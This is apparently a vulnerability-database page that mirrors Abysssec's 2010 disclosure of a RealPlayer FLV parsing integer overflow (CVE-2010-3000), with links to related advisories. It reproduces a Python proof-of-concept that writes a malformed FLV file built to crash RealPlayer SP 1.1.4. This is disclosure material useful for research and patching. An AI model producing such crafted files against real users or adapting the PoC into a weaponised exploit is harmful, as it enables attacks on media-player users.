Lucene search
K

Month Of Abysssec Undisclosed Bugs - RealPlayer

🗓️ 14 Sep 2010 00:00:00Reported by AbysssecType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 34 Views

RealPlayer FLV Parsing Integer Overflo

Related
Code
ReporterTitlePublishedViews
Family
0day.today
RealPlayer FLV Parsing Integer Overflow
13 Sep 201000:00
zdt
Tenable Nessus
Real Networks RealPlayer SP < 1.1.5 Multiple Vulnerabilities
27 Aug 201000:00
nessus
Tenable Nessus
RealPlayer for Windows < Build 12.0.0.879 Multiple Vulnerabilities
27 Aug 201000:00
nessus
Circl
CVE-2010-3000
13 Sep 201000:00
circl
Check Point Advisories
RealNetworks RealPlayer FLV Parsing Multiple Integer Overflows (CVE-2010-3000)
13 Sep 201000:00
checkpoint_advisories
CVE
CVE-2010-3000
30 Aug 201019:00
cve
Cvelist
CVE-2010-3000
30 Aug 201019:00
cvelist
Exploit DB
RealPlayer - FLV Parsing Integer Overflow
13 Sep 201000:00
exploitdb
exploitpack
RealPlayer - FLV Parsing Integer Overflow
13 Sep 201000:00
exploitpack
NVD
CVE-2010-3000
30 Aug 201020:00
nvd
Rows per page
`'''  
__ __ ____ _ _ ____  
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ <  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
'''  
  
'''  
Title : RealPlayer FLV Parsing Multiple Integer Overflow  
Version : RealPlayer SP 1.1.4  
Analysis : http://www.abysssec.com  
Vendor : http://www.real.com  
Impact : High  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-3000  
'''  
  
  
# POC for CVE-2010-3000  
# http://www.exploit-db.com/moaub-13-realplayer-flv-parsing-multiple-integer-overflow/  
# http://www.exploit-db.com/sploits/moaub-13-exploit.zip  
  
import sys  
  
def main():  
  
flvHeader = '\x46\x4C\x56\x01\x05\x00\x00\x00\x09'  
flvBody1 = '\x00\x00\x00\x00\x12\x00\x00\x15\x00\x00\x00\x00\x00\x00\x00\x02\x00\x0A\x6F\x6E\x4D\x65\x74\x61\x44\x61\x74\x61\x08'  
HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value = "\x07\x50\x75\x08" # if value >= 0x7507508 --> crash  
flvBody2 = "\x00\x00\x09\x00\x00\x00\x20"  
  
flv = open('poc.flv', 'wb+')  
flv.write(flvHeader)  
flv.write(flvBody1)  
flv.write(HX_FLV_META_AMF_TYPE_MIXEDARRAY_Value)  
flv.write(flvBody2)  
  
flv.close()  
print '[-] FLV file generated'  
  
if __name__ == '__main__':  
main()  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Sep 2010 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.07499
34